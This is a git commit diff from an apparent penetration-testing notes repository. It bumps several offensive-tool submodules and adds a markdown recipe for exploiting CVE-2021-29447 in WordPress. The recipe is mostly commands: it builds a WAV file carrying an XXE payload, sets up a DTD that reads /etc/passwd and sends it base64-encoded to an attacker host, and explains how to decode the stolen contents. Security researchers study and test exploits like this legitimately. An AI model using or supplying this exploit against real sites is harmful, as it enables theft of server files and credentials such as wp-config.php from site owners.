added wp exploit

PayloadsAllTheThings

@@ -1 +1 @@
-Subproject commit 88321a332f52d0fa01cad450bd093c8b34eb3213
+Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631

enumeration/Checklists

@@ -1 +1 @@
-Subproject commit 056873d277f7554c10c2eafb10fece59d986036f
+Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60

enumeration/windows/Windows-Exploit-Suggester-python3

@@ -0,0 +1 @@
+Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a

exploit/binaries/buffer_overflow/peda

@@ -0,0 +1 @@
+Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43

exploit/web/xxe/wp_xxe_.md

@@ -0,0 +1,30 @@
+# CVE-2021-29447
+
+* Upload of wav file has following consequences
+    * **Arbitrary File Disclosure** for example `wp-config.php`
+    * **Server Side Request Forgery** 
+
+
+## Usage
+
+* Create `wav` Payload
+```sh
+echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
+```
+* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
+```sh
+<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
+<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
+```
+
+* Launch http server
+```sh
+php -S 0.0.0.0:8000
+python -m http.server
+```
+* Copy returned base64 into `php` file
+```php
+<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?> 
+```
+
+

nishang

@@ -1 +1 @@
-Subproject commit 414ee1104526d7057f9adaeee196d91ae447283e
+Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941